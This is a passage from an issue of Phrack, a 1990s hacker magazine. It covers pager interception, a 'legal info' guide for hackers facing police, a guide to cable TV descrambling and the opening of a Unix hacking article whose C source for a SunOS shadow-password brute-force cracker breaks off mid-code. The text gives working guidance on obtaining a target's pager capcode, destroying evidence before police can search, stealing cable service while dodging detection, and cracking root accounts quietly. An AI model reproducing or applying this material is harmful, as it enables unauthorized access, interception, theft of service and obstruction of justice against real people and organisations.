280.0875 T,N,A Indonesia 151.175 - 153.050 A Ireland 153.000 - 153.825 T,N,A Italy 466.075 T,N,A 161.175 T,N Japan 278.1625 - 283.8875 T,N Korea 146.320 - 173.320 T,N,A Malaysia 152.175 - 172.525 N,A,V 931.9375 N,A Netherlands 156.9865 - 164.350 T,N,A New Zealand 157.925 - 158.050 T,N,A Norway 148.050 - 169.850 T,N,A Singapore 161.450 N,A 931.9375 N,A Sweden 169.8 T,N,A Switzerland 149.5 T,N,A Taiwan 166.775 N,A 280.9375 N,A Thailand 450.525 N,A 172.525 - 173.475 N,A UK 138.150 - 153.275 T,N,A 454.675 - 466.075 T,N,A T = Tone N = Numeric A = Alphanumeric V = Voice ** INTERCEPTION AND THE LAW ** For many years the interception of pages was not considered an invasion of privacy because of the limited information provided by the tone-only pagers in use at the time. In fact, when Congress passed the Electronic Communications Privacy Act in 1986 tone-only pagers were exempt from its provisions. According to the ECPA, monitoring of all other types of paging signals, including voice, is illegal. But, due to this same law, paging transmissions are considered to have a reasonable expectation to privacy, and Law Enforcement officials must obtain a proper court order to intercept them, or have the consent of the subscriber. To intercept pages, many LE-types will obtain beepers programmed with the same capcode as their suspect. To do this, they must contact the paging company and obtain the capcode associated with the person or phone number they are interested in. However, even enlisting the assistance of the paging companies often requires following proper legal procedures (warrants, subpoenas, etc.). More sophisticated pager-interception devices are sold by a variety of companies. SWS Security sells a device called the "Beeper Buster" for about $4000.00. This particular device is scheduled as a Title III device, so any possession of it by someone outside a law enforcement agency is a federal crime. Greyson Electronics sells a package called PageTracker that uses an ICOM R7100 in conjunction with a personal computer to track and decode pager messages. (Greyson also sells a similar package to decode AMPS cellular messages from forward and reverse channels called "CellScope.") For the average hacker-type, the most realistic and affordable option is the Universal M-400 decoder. This box is about 400 bucks and will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF, Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. It takes audio input from any scanners external speaker jack, and is probably the best decoder available to the Hacker/HAM for the price. Output from the M400 shows the capcode followed by T, N or A (tone, numeric or alpha) ending with the message sent. Universal suggests hooking the input to the decoder directly to the scanner before any de-emphasis circuitry, to obtain the true signal. (Many scanners alter the audio before output for several reasons that aren't really relevant to this article...they just do. :) ) Obviously, even by viewing the pager data as it streams by is of little use to anyone without knowing to whom the pager belongs to. Law Enforcement can get a subpoena and obtain the information easily, but anyone else is stuck trying to social engineer the paging company. One other alternative works quite well when you already know the individuals pager number, and need to obtain the capcode (for whatever reason). Pager companies will buy large blocks in an exchange for their customers. It is extremely easy to discover the paging company from the phone number that corresponds to the target pager either through the RBOC or by paging someone and asking them who their provider is when they return your call. Once the company is known, the frequencies allocated to that company are registered with the FCC and are public information. Many CD-ROMs are available with the entire FCC Master Frequency Database. (Percon sells one for 99 bucks that covers the whole country - 716-386-6015) Libraries and the FCC itself will also have this information available. With the frequency set and a decoder running, send a page that will be incredibly easy to discern from the tidal wave of pages spewing forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...) It will eventually scroll by, and presto! How many important people love to give you their pager number? ** THE FUTURE ** With the advent of new technologies pagers will become even more present in both our businesses and private lives. Notebook computers and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards. Some of these cards have actual screens that allow for use without the computer, but most require a program to pull message data out. These cards also have somewhat large storage capacity, so the length of messages have the option of being fairly large, should the service provider allow them to be. With the advent of 8-bit alphanumeric services, users with PCMCIA pagers can expect to receive usable computer data such as spreadsheet entries, word processing documents, and of course, GIFs. (Hey, porno entrepreneurs: beeper-porn! Every day, you get a new gif sent to your pagecard! Woo Woo. Sad thing is, it would probably sell.) A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A Roaming Computer) was one of the first to allow for such broadcasts. EMBARC makes use of a proprietary Motorola protocol, rather than POCSAG, so subscribers must make use of either a Motorola NewsStream pager (with nifty serial cable) or a newer PCMCIA pager. Messages are sent to (and received by) the user through the use of special client software. The software dials into the EMBARC message switch accessed through AT&T's ACCUNET packet-switched network. The device itself is used for authentication (most likely its capcode or serial number) and some oddball protocol is spoken to communicate with the switch. Once connected, users have the option of sending a page out, or retrieving pages either too large for the memory of the pager, or from a list of all messages sent in the last 24 hours, in case the subscriber had his pager turned off. Additionally, the devices can be addressed directly via x.400 addresses. (X.400: The CCITT standard that covers email address far too long to be worth sending anyone mail to.) So essentially, any EMBARC customer can be contacted from the Internet. MTEL, the parent company of the huge paging service SkyTel, is implementing what may be the next generation of paging technologies. This service, NWN, being administrated by MTEL subsidiary Destineer, is most often called 2-way paging, but is more accurately Narrowband-PCS. The network allows for the "pager" to be a transceiver. When a page arrives, the device receiving the page will automatically send back an acknowledgment of its completed reception. Devices may also send back some kind of "canned response" the user programs. An example might be: "Thanks, I got it!" or "Why on Earth are you eating up my allocated pages for the month with this crap?" MTEL's service was awarded a Pioneers Preference by the FCC, which gave them access to the narrowband PCS spectrum before the auctions. This is a big deal, and did not go unnoticed by Microsoft. They dumped cash into the network, and said the devices will be supported by Chicago. (Yeah, along with every other device on the planet, right? Plug and Pray!) The network will be layed out almost identically to MTEL's existing paging network, using dedicated lines to connect towers in an area to a central satellite up/downlink. One key difference will be the addition of highly somewhat sensitive receivers on the network, to pick up the ACKs and replies of the customer units, which will probably broadcast at about 2 or 3 watts. The most exciting difference will be the speed at which the network transmits data: 24,000 Kbps. Twenty-four thousand. (I couldn't believe it either. Not only can you get your GIFs sent to your pager, but you get them blinding FAST!) The actual units themselves will most likely look like existing alphanumeric pagers with possibly a few more buttons, and of course, PCMCIA units will be available to integrate with computer applications. Beyond these advancements, other types of services plan on offering paging like features. CDPD, TDMA & CDMA Digital Cellular and ESMR all plan on providing a "pager-like" option for their customers. The mere fact that you can walk into a K-Mart and buy a pager off a rack would indicate to me that pagers are far to ingrained into our society, and represent a wireless technology that doesn't scare or confuse the yokels. Such a technology doesn't ever really go away. ** BIBLIOGRAPHY ** Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_, p. 8, July, 1994. O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994. O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 9 of 28 **************************************************************************** Legal Info by Szechuan Death OK. This document applies only to United States citizens: if you are a citizen of some other fascist country, don't come whining to me when this doesn't work..... :) Make no mistake: I'm not a lawyer. I've merely paid attention and picked up some facts that might be useful to me along the way. There are three subjects that it pays to have a knowledge of handy: prescription drugs, medical procedures, and legal facts. While these may all be boring as hell, they can certainly pull your ass out of the fire in a pinch. Standard disclaimer: I make no claims about this document or facts contained therein. I also make no claims about their legal authenticity: if you want to be 100% sure, there's a library in damn near every town, LOOK IT UP! One more thing: This document is useful for virtually ANYTHING. It's effectiveness stretches far beyond computer hacking (although it's worn a bit thin for serious crimes, as every cretin on Death Row has tried it already.....:) OK. Let's say, just for the sake of argument, that you've decided to take a walk along the wild side and do something illegal. For our purposes, let's say computer hacking (imagine that). There are many things you can do cover your legal ass, should your activities come to the attention of any of our various friendly law-enforcement agencies nationwide. -- Part 1: Police Mentality You must understand the police, if you ever want to be able to thwart them and keep your freedom. Most police, to survive in their jobs, have developed an "Us vs. Them" attitude, which we should tolerate (up to a point). They use this attitude to justify their fascist tactics. "Us" is the police, a brotherhood that keeps the peace, always does right, and never snitches on each other, no matter what the cause. "Them" is the rest of the population. If "They" are not guilty of a specific crime, they must have done something else, and they're doing their damndest to avoid getting caught. In addition, many police have cultivated an attitude similar to that of a 15-year-old high school punk: "I'm bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc. Unfortunately, these people have weapons and the authority to support that attitude. Therefore, if the police come to your house, be EXTREMELY polite and subservient; now is not the time to start spouting your opinion about the police state in America today. Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides adding a charge of "Resisting Arrest" and/or "Assaulting an Officer", it can get very dangerous. The police have been trained in a number of suspect-control techniques, most of which involve twisting body parts at unnatural angles. As if this weren't enough, almost all police carry guns. Start fighting and you'll get a couple broken bones, torn ligaments, or worse, a few bullet wounds (possibly fatal). So remember, be very meek. Show them that you are cowed by their force and their blustering presence, and this will save you a black eye or two on the way down to the station (from tripping and falling, of course). -- Part 2: Hacker's Security CARDINAL RULE #1: Get rid of the evidence. No evidence = no case for the prosecutor. The Novice Hacker's Guide from LOD has an excellent way to put this: VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law. It doesn't hurt to store everything encrypted on your hard disk, or keep your notes buried in the backyard or in the trunk of your car. You may feel a little funny, but you'll feel a lot funnier when you when you meet Bruno, your transvestite cellmate who axed his family to death. Basic hints: Hide all your essential printouts, or burn them if they're trash (remember: police need no warrant to search your trash). Encrypt the files on your hard drive with something nasty, like PGP or RSA. Use a file-wiper, NOT delete, to get rid of them when you're done. And WIPE, don't FORMAT, your floppies and other magnetic media (better still, degauss them). With a little common sense and a bit of effort, a great deal of legal headaches can be avoided. -- Part 3A: Polite Entry Next part. You and your friends are enjoying an evening of trying to polevault the firewall on whitehouse.com, when suddenly you hear a knock at the door. Opening the door, you find a member of the local police force standing outside, asking if he can come in and ask you some questions. Now, here's where you start to piss your pants. If you were smart, you'll have arranged something beforehand where your friends (or, if there ARE no friends present, an automatic script) are getting rid of the evidence as shown in part 2. If you have no handy means of destroying the data (printouts, floppies, tapes, etc.), throw the whole mess into the bathtub, soak it in lighter fluid, and torch it. It's a helluva mess to clean up, but nothing compared to latrine duty at your nearest federal prison. While the evidence is being destroyed, you're stalling the police. Ask to see their search warrant and IDs. Mull over each and every one of them for at least 5 minutes. If they have none, start screaming about your 4th Amendment rights. Most importantly: DON'T INVITE THEM IN. They're like vampires: if you let them in, you're fucked. If they see anything even REMOTELY incriminating, that constitutes probable cause for a search and they'll be swarming all over your house like flies on shit. (And guess what! It's legal, because YOU LET THEM IN!) Now, be aware that this won't stall them forever: they can simply wait outside the house and radio in a request for a search warrant, which will probably be signed by the judge on duty at that time. Remember: "If you're not willing to be searched, you MUST have something to hide!" If there are no friends assisting you, as shown above, USE THIS TIME EFFECTIVELY. When they get the warrant signed, that will be too late, because you'll have erased/shredded/burned/hidden/etc. all the incriminating evidence. -- Part 3B: And Suddenly, The Door Burst In Now, if the police already have a search warrant, they don't need to knock on the door. They can simply kick the door down and waltz in. If you're there at the time, you CAN try and stall them as shown above, by asking to see their search warrant and IDs. This may not work now, because they have you cold, hard, and dead to rights. And, if anything incriminating is in a place where they can find it, you're fucked, because it WILL be used as evidence. But this won't happen to you, because you've already put everything you're not using right at the moment in a safe, HIDDEN, place. Right? This leaves the computer. If you hear them kicking the door in, keep calm, and run a script you've set up beforehand to low- level-format the drive, wipe all hacking files, encrypt the whole thing, etc. If there's any printouts or media hanging out, try and hide them (probably worthless anyway, but worth a try). The name of the game now is to minimize the damage that can be done to you. The less hard evidence linking you to the "crime", the less of a case the prosecutor will have and the better off you'll be. -- Part 4: The Arrest Now is the time to kick all your senses into hyper-record mode. For you to get processed through the system without a hitch, the arrest has to go perfectly, by the numbers. One small slip and you're out through a loophole. Now, the police are aware of this and will be doing their best to see that doesn't happen, but you may get lucky all the same. First of all: According to the Miranda Act, the police are REQUIRED BY LAW to read you your rights and make sure you understand them. Remember EVERY WORD THEY SAY TO YOU. If they don't say it correctly, you may be able to get off on a technicality. CARDINAL RULE #2: You have the right to remain silent. EXERCISE IT. This cannot be stressed enough. If you need a reminder, listen to the first part of the Miranda Warning: "You have the right to remain silent. If you give up that right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT OF LAW." Nice ring to it, hmm? The only words coming out of your mouth at this point should be "I'd like to speak to my attorney, please" and, if applicable in your area, "I'd like to make a phone call, please" (remember the "please's," see part #1 above) Nothing else. There are tape recorders, video cameras, PLUS the word of a dozen police officers to back it all up. How's that for an array of damning evidence against you? Then, after the ride downtown, you'll be booked and probably asked a few questions. Say nothing. You're probably pissing your pants with fear at this point, and may be tempted to roll over on everyone you ever shook hands with in your whole life, but keep your calm, and KEEP QUIET. Keep asking for your attorney and/or a phone call, no matter WHAT threats/deals/etc. they make to you. Remember, they can't legally interrogate you without your attorney present. You may also be tempted to show your mettle at this point, and give them false information, but remember one thing: If you lie to them, you can be convicted of perjury (a nasty offense itself). The best policy here is NSA: Never Say Anything. Remember, you never have to keep track of what you've said, or have to worry about having it used against you, if you've said NOTHING. -- Part 5: The Trial Here, we'll assume you've been arrested, booked, let out on bail, indicted on X counts of so-and-so, etc. You're now in the system. CARDINAL RULE #3: Get the best criminal defense attorney you can afford, preferably one with some background in the crime you've committed. No, scratch that: make that the best criminal defense attorney, PERIOD. It's a helluva lot better to spend 5 years working at McDonald's 12 hours a day to pay back your legal fee, than it is to spend 5 years in the slammer getting pimped out nightly for a pack of menthols. Also, pay attention during the trial. Remember, the defense attorney is working for YOU: it's YOUR life they're deciding, so give him every bit of information and help you can. You're paying him to sort it out for you, but you should still keep an eye on things: if, in the middle of a trial, something happens (you get a killer idea, or want to jump up and scream "BULLSHIT!"), TELL HIM! It very well might be useful! Also, have him nitpick every single thing for loopholes, technicalities, civil rights violations, etc. It's worth it if it pays off. Another important thing is to look good. Image is everything. Although you might prefer to wear heavily stained rock-band T- shirts, leather jackets, ratty jeans, etc. in real life, that will be EXTREMELY damning in the eyes of the judge/jury. They say that clothes make the man, and in this case it's REALLY true: get a suit, comb/cut your hair, shave, etc. Make yourself look like a "positively respectable darling" in the eyes of the court! It'll pay off for you. (hey, it worked for Eric and Lyle Menendez) -- Part 8: The Prison If you're here, you're totally fucked. Unless, by divine intervention, your conviction is overturned on appeal, you'd better clear up the next 5 years on your calendar. Apparently, you didn't read closely enough, so read this every day during your long stay in prison, and you'll be better equipped next time (assuming there IS a next time..... :) Remember the cardinal rules: 1) Don't leave evidence around to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best attorney available. If you remember these, and exercise some common sense and a lot of caution, you should have no problem handling any legal problems that come up. Note: This is intended to be used as a handbook for defense from minor crimes ONLY (hacking, DWI, etc.) If you're a career criminal, or you've murdered or raped somebody, you're scum, and at least have the grace to plead "guilty". Don't waste the tax- payers' time and money with fancy legal footwork. Please feel free to add anything or correct this document. However, if you DO add or correct something, PLEASE make sure it's true, and PLEASE email me the changes so I can include them in the next revision of the document. My address is pstlb@acad3.alaska.edu. Happy hacking to all, and if this helps you avoid getting caught, so much the better. :) ==Phrack Magazine== Volume Five, Issue Forty-Six, File 10 of 28 **************************************************************************** /**************************/ /* A Guide to Porno Boxes */ /* by Carl Corey */ /**************************/ Keeping with tradition, and seeing that this is the first article in Phrack on cable TV descrambling, any illegal box for use in descrambling cable television signals is now known as a PORNO BOX. There are many methods that cable companies use to insure that you get what you pay for - and _only_ what you pay for. Of course, there are always methods to get 'more than you pay for'. This file will discuss the most important aspects of these methods, with pointers to more detailed information, including schematics and resellers of equipment. Part I. How the cable company keeps you from getting signals A brief history ---Older Systems--- Most scrambling methods are, in theory, simple. The original method used to block out signals was the trap method. All traps remove signals that are sent from the CATV head end (the CATV company's station). The first method, which is rarely used anymore was the negative trap. Basically, every point where the line was dropped had these traps, which removed the pay stations from your signal. If you decided to add a pay station, the company would come out and remove the trap. This method was pretty secure - you would provide physical evidence of tampering if you climbed the pole to remove them or alter them (sticking a pin through them seemed to work randomly, but could affect other channels, as it shifts the frequency the trap removes.) This was a very secure system, but did not allow for PPV or other services, and required a lot of physical labor (pole-climbers aren't cheap). The only places this is used anymore is in an old apartment building, as one trip can service several programming changes. Look for a big gray box in the basement with a lot of coax going out. If you are going to give yourself free service, give some random others free service to hide the trail. The next method used was termed a positive trap. With this method, the cable company sends a _very_ strong signal above the real signal. A tuner sees the strong signal, and locks onto the 'garbage' signal. A loud beeping and static lines would show up on the set. For the CATV company to enable a station, they put a 'positive' trap on the line, which (despite the name) removes the garbage signal. Many text files have been around on how to descramble this method (overlooking the obvious, buying a (cheap) notch filter), ranging from making a crude variable trap, to adding wires to the cable signal randomly to remove the signal. This system is hardly used anymore, as you could just put a trap inside your house, which wouldn't be noticed outside the house. ---Current Systems--- The next advent in technology was the box. The discussion of different boxes follows, but there is one rather new technology which should be discussed with the traps. The addressable trap is the CATV's dream. It combines the best features of the negative trap (very difficult to tamper with without leaving evidence) with features of addressable boxes (no lineman needs to go out to add a service, computers can process Pay Per View or other services). Basically, a 'smart trap' sits on the pole and removes signals at will. Many systems require a small amp inside the house, which the cable company uses to make sure that you don't hook up more than one TV. I believe that the new CATV act makes this illegal, and that a customer does not have to pay for any extra sets (which do not need equipment) in the house. Of course, we all know that the cable TV company will do whatever it wants until it is threatened with lawsuits. Cable boxes use many different methods of descrambling. Most are not in use anymore, with a few still around, and a few around the corner in the future. The big thing to remember is sync suppression. This method is how the cable companies make the picture look like a really fucked up, waving Dali painting. Presently the most popular method is the Tri-mode In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10 dB. The sync can be changed randomly once per field, and the information necessary for the box to rebuild a sync signal. This very common system is discussed in Radio-Electronics magazine in the 2/87 issue. There are schematics and much more detailed theory than is provided here. The other common method currently used is SSAVI, which is most common on Zenith boxes. It stands for Sync Suppression And Video Inversion. In addition to sync suppression, it uses video inversion to also 'scramble' the video. There is no sync signal transmitted separately (or reference signal to tell the box how to de-scramble) as the first 26 lines (blank, above the picture) are not de-synched, and can be re-synched with a phased lock loop - giving sync to the whole field. The data on inversion is sent somewhere in the 20 or 21st line, which is outside of the screen. Audio can be scrambled too, but it is actually just moved to a different frequency. Radio Electronics August 92 on has circuits and other info in the Drawing Board column. ---Future Systems- For Pioneer, the future is now. The system the new Pioneers use is patented and Pioneer doesn't want you to know how it works. From the patent, it appears to use combinations of in-band, out-band, and keys (also sending false keys) to scramble and relay info necessary to descramble. These boxes are damn slick. The relevant patents are US #5,113,411 and US #4,149,158 if you care to look. There is not much information to be gained from them. Look for future updates to this article with info on the system if I can find any :) Other systems are the VideoCipher + (used on satellites now - this is scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are similar, with Digi encrypting the video with DES also (yikes)... And they all use changing keys and other methods. Oak Sigma converters use similar methods which are available now on cable. (digital encryption of audio, etc...) Part II. How the cable company catches you getting those signals There are many methods the CATV company can use to catch you, or at least keep you from using certain methods. Market Code: Almost _all_ addressable decoders now use a market code. This is part of the serial number (which is used for pay per view addressing) which decodes to a general geographic region. Most boxes contain code which tell it to shut down if it receives a code (which can be going to any box on the cable system) which is from a different market area. So if you buy a converter that is say, market-coded for Los Angeles, you won't be able to use it in New York. Bullets: The bullet is a shut down code like above - it will make your box say 'bAh' and die. The method used most is for the head end to send messages to every box they know of saying 'ignore the next shutdown message' ... and once every (legit) box has this info, it sends the bullet. The only boxes that actually process the bullet are ones which the CATV system doesn't know about. P.S. Don't call the cable company and complain about cable if you are using an illegal converter - and be sure to warn anyone you live with about calling the CATV co. also. Leak Detection: The FCC forces all cable companies to drive around and look for leaks - any poor splice jobs (wiring your house from a neighbors without sealing it up nice) and some descramblers will emit RF. So while the CATV is looking for the leaks, they may catch you. Free T-Shirts: The cable company can, with most boxes, tell the box to display a different signal. So they can tell every box they know of (the legit box pool) to display a commercial on another channel, while the pirate boxes get this real cool ad with an 1800 number for free t-shirts... you call, you get busted. This is mostly done during PPV boxing or other events which are paid for - as the company knows exactly who should get that signal, and can catch even legit boxes which are modified to receive the fight. Your Pals: Programs like "Turn in a cable pirate and get $100" let you know who your friends _really_ are. Part III: How to get away with it. I get a lot of questions about opening a box that you own. This is not a good idea. Most, if not ALL boxes today have a tamper sensor. If you open the box, you break a tab, flip a switch, etc... This disables the box and leaves a nice piece of evidence for the CATV co. to show that you played with it. I also have had questions about the old "unplug the box when it is enabled, then plug it back in later"... The CATV company periodically sends a signal to update all the boxes to where they should be. If you want to do this, you'll need to find out where the CATV sends the address information, and then you need to trap it out of the signal. So as soon as the fraudulent customer (let's call him Chris) sees his box get the signal to receive the PPV porn channel, he installs the trap and now his box will never get any pay per view signals again... but he'll always have whatever he was viewing at the time he put the trap in. Big problem here is that most _newer_ systems also tell the box how long it can descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3 hours have passed"... Where to make/buy/get porno boxes: You can order a box which has been modified not to accept bullets. This method is pretty expensive. You can also get a 'pan' descrambler - it is a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and descrambles it. These boxes can't be killed by the bullets, and work pretty well. There are some pans which are made by the same company as your cable box and are sensitive to bullets, so beware. There are two basic ideas for modifying a box (provided you get detailed instructions on how to get it open, or how to fix it once you open it). You can change the S/N to something which is known as 'universal' or disassemble the code and remove the jump to the shutdown code. The universal codes are rare, and may be extinct. Besides, if the cable company finds out your code, they can nuke it. This happens when someone who makes (err made) 'universal' chips gets busted. The modification of the actual code is the best way to do it, just forcing a positive response to permission checks is the easiest way. A 'cube' is not a NeXT, it's a device which removes the data signal from the cable line, and inserts a 'nice' data signal which tells your box to turn everything on. A 'destructive' cube actually re-programs all the boxes below it to a new serial number and gives that number full privileges, while a 'non-destructive' cube needs to know your boxes serial number, so it can tell your box (without modifications) that it can view everything. You have to get a new IC if you change boxes, but the plus is that you can remove the cube and the box functions as normal. Then again, you have to trust the place you are ordering the cube from to not be working for the cable company, as you have to give them your box serial number - which the CATV cable has in their records. Cubes have been seen for sale in the back of Electronics Now (formerly Radio Electronics). Of course, you could check in the above mentioned articles and build circuitry, it would be a lot cheaper. The only problem is that you have to be good enough not to fuck it up - TV signals are very easy to fuck up. Then there is the HOLY GRAIL. Most scrambling systems mess with the sync pulse. This pulse is followed by the colorburst signal on NTSC video. Basically, the grail finds the colorburst and uses it as a reference signal. In theory, it works wonderfully (but does not fix the video inversion problems found on SSAVI systems). However, with the sync pulse whacked, the colorburst method may give weak color or color shifts. The schematics are in the May 1990 Radio-Electronics. I have also received email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is a modified (supposedly higher quality) version of the R-E schematics. The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and etched board. A little steep, but not too bad. E-mail the above for more information. Anyway, that's all for now. Remember, information (including XXX movies) wants to be free! Carl Corey / dEs ==Phrack Magazine== Volume Five, Issue Forty-Six, File 11 of 28 **************************************************************************** *********************************** * Unix Hacking Tools of the Trade * * * * By * * * * The Shining/UPi (UK Division) * *********************************** Disclaimer : The following text is for educational purposes only and I strongly suggest that it is not used for malicious purposes....yeah right! Introduction : Ok, I decided to release this phile to help out all you guys who wish to start hacking unix. Although these programs should compile & run on your system if you follow the instructions I have given, knowing a bit of C will come in handy if things go wrong. Other docs I suggest you read are older 'phrack' issues with shooting sharks various articles on unix, and of course, 'Unix from the ground up' by The Prophet. This article includes three programs, a SUNOS Brute force Shadow password file cracker, The Ultimate Login Spoof, and a Unix Account Validator. Shadow Crack ------------ SUNOS Unix brute force shadow password file cracker --------------------------------------------------- Well, a while back, I saw an article in phrack which included a brute force password cracker for unix. This was a nice idea, except that these days more and more systems are moving towards the shadow password scheme. This, for those of you who are new to unix, involves storing the actual encrypted passwords in a different file, usually only accessible to root. A typical entry from a System V R4 password file looks like this :- root:x:0:1:Sys. admin:/:/bin/sh with the actual encrypted password replaced by an 'x' in the /etc/passwd file. The encrypted password is stored in a file(in the case of sysV) called /etc/shadow which has roughly the following format :- root:XyfgFekj95Fpq::::: this includes the login i.d., the encrypted password, and various other fields which hold info on password ageing etc...(no entry in the other fields indicate they are disabled). Now this was fine as long as we stayed away from system V's, but now a whole load of other companies have jumped on the bandwagon from IBM (aix) to Suns SUNOS systems. The system I will be dealing with is SUNOS's shadowed system. Now, like sysV, SUNOS also have a system whereby the actual encrypted passwords are stored in a file usually called /etc/security/passwd.adjunct, and normally this is accessible only by root. This rules out the use of brute force crackers, like the one in phrack quite a while back, and also modern day programs like CRACK. A typical /etc/passwd file entry on shadowed SUNOS systems looks like this :- root:##root:0:1:System Administrator:/:/bin/csh with the 'shadow' password file taking roughly the same format as that of Sys V, usually with some extra fields. However, we cannot use a program like CRACK, but SUNOS also supplied a function called pwdauth(), which basically takes two arguments, a login name and decrypted password, which is then encrypted and compared to the appropriate entry in the shadow file, thus if it matches, we have a valid i.d. & password, if not, we don't. I therefore decided to write a program which would exploit this function, and could be used to get valid i.d's and passwords even on a shadowed system! To my knowledge the use of the pwdauth() function is not logged, but I could be wrong. I have left it running for a while on the system I use and it has attracted no attention, and the administrator knows his shit. I have seen the functions getspwent() and getspwnam() in Sys V to manipulate the shadow password file, but not a function like pwdauth() that will actually validate the i.d. and password. If such a function does exist on other shadowed systems then this program could be very easily modified to work without problems. The only real beef I have about this program is that because the pwdauth() function uses the standard unix crypt() function to encrypt the supplied password, it is very slow!!! Even in burst mode, a password file with 1000's of users could take a while to get through. My advice is to run it in the background and direct all its screen output to /dev/null like so :- shcrack -mf -uroot -ddict1 > /dev/null & Then you can log out then come back and check on it later! The program works in a number of modes, all of which I will describe below, is command line driven, and can be used to crack both multiple accounts in the password file and single accounts specified. It is also NIS/NFS (Sun Yellow Pages) compatible. How to use it ------------- shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file] Usage :- -m[mode] there are 3 modes of operation :- -mb Burst mode, this scans the password file, trying the minimum number of password guessing strategies on every account. -mi Mini-burst mode, this also scans the password file, and tries most password guessing strategies on every account. -mf Brute-force mode, tries all password strategies, including the use of words from a dictionary, on a single account specified. more about these modes in a sec, the other options are :- -p[password file] This is the password file you wish to use, if this is left unspecified, the default is /etc/passwd. NB: The program automatically detects and uses the password file wherever it may be in NIS/NFS systems. -u[user id] The login i.d. of the account you wish to crack, this is used in Brute-force single user mode. -d[dict file] This uses the words in a dictionary file to generate possible passwords for use in single user brute force mode. If no filename is specified, the program only uses the password guessing strategies without using the dictionary. Modes ^^^^^ -mb Burst mode basically gets each account from the appropriate password file and uses two methods to guess its password. Firstly, it uses the account name as a password, this name is then reversed and tried as a possible password. This may seem like a weak strategy, but remember, the users passwords are already shadowed, and therefore are deemed to be secure. This can lead to sloppy passwords being used, and I have came across many cases where the user has used his/her i.d. as a password. -mi Mini-burst mode uses a number of other password generating methods as well as the 2 listed in burst mode. One of the methods involves taking the login i.d. of the account being cracked, and appending the numbers 0 to 9 to the end of it to generate possible passwords. If this mode has no luck, it then uses the accounts gecos 'comment' information from the password file, splitting it into words and trying these as passwords. Each word from the comment field is also reversed and tried as a possible password. -mf Brute-force single user mode uses all the above techniques for password guessing as well as using a dictionary file to provide possible passwords to crack a single account specified. If no dictionary filename is given, this mode operates on the single account using the same methods as mini-burst mode, without the dictionary. Using shadow crack ------------------ To get program help from the command line just type :- $ shcrack which will show you all the modes of operation. If you wanted to crack just the account 'root', located in /etc/passwd(or elsewhere on NFS/NIS systems), using all methods including a dictionary file called 'dict1', you would do :- $ shcrack -mf -uroot -ddict1 to do the above without using the dictionary file, do :- $ shcrack -mf -uroot or to do the above but in password file 'miner' do :- $ shcrack -mf -pminer -uroot to start cracking all accounts in /etc/passwd, using minimum password strategies do :- $ shcrack -mb to do the above but on a password file called 'miner' in your home directory do :- $ shcrack -mb -pminer to start cracking all accounts in 'miner', using all strategies except dictionary words do :- $ shcrack -mi -pminer ok, heres the code, ANSI C Compilers only :- ---cut here------------------------------------------------------------------- /* Program : Shadow Crack Author : (c)1994 The Shining/UPi (UK Division) Date : Released 12/4/94 Unix type : SUNOS Shadowed systems only */ #include #include #include #include #include #define WORDSIZE 20 /* Maximum word size */ #define OUTFILE "data" /* File to store cracked account info */ void word_strat( void ), do_dict( void ); void add_nums( char * ), do_comment( char * ); void try_word( char * ), reverse_word( char * ); void find_mode( void ), burst_mode( void ); void mini_burst( void ), brute_force( void ); void user_info( void ), write_details( char * ); void pwfile_name( void ), disable_interrupts( void ), cleanup(); char *logname, *comment, *homedir, *shell, *dict, *mode, *pwfile, *pwdauth(); struct passwd *getpwnam(), *pwentry; extern char *optarg; int option, uid, gid; int main( int argc, char **argv ) { disable_interrupts(); system("clear"); if (argc < 2) { printf("Shadow Crack - (c)1994 The Shining\n"); printf("SUNOS Shadow password brute force cracker\n\n"); printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]); printf("-d[dictfile]\n\n\n"); printf("[b] is burst mode, scans pwfile trying minimum\n"); printf(" password strategies on all i.d's\n\n"); printf("[i] is mini-burst mode, scans pwfile trying both\n"); printf(" userid, gecos info, and numbers to all i.d's\n\n"); printf("[f] is bruteforce mode, tries all above stategies\n"); printf(" as well as dictionary words\n\n"); printf("[pwfile] Uses the password file [pwfile], default\n"); printf(" is /etc/passwd\n\n"); printf("[loginid] Account you wish to crack, used with\n"); printf(" -mf bruteforce mode only\n\n"); printf("[dictfile] uses dictionary file [dictfile] to\n"); printf(" generate passwords when used with\n"); printf(" -mf bruteforce mode only\n\n"); exit(0); } /* Get options from the command line and store them in different variables */ while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF) switch(option) { case 'm': mode = optarg; break; case 'p': pwfile = optarg; break; case 'u': logname = optarg; break; case 'd': dict = optarg; break; default: printf("wrong options\n"); break; } find_mode(); } /* Routine to redirect interrupts */ void disable_interrupts( void ) { signal(SIGHUP, SIG_IGN); signal(SIGTSTP, cleanup); signal(SIGINT, cleanup); signal(SIGQUIT, cleanup); signal(SIGTERM, cleanup); } /* If CTRL-Z or CTRL-C is pressed, clean up & quit */ void cleanup( void ) { FILE *fp; if ((fp = fopen("gecos", "r")) != NULL) remove("gecos"); if ((fp = fopen("data", "r")) == NULL) printf("\nNo accounts cracked\n"); printf("Quitting\n"); exit(0); } /* Function to decide which mode is being used and call appropriate routine */ void find_mode( void ) { if (strcmp(mode, "b") == NULL) burst_mode(); else if (strcmp(mode, "i") == NULL) mini_burst(); else if (strcmp(mode, "f") == NULL) brute_force(); else { printf("Sorry - No 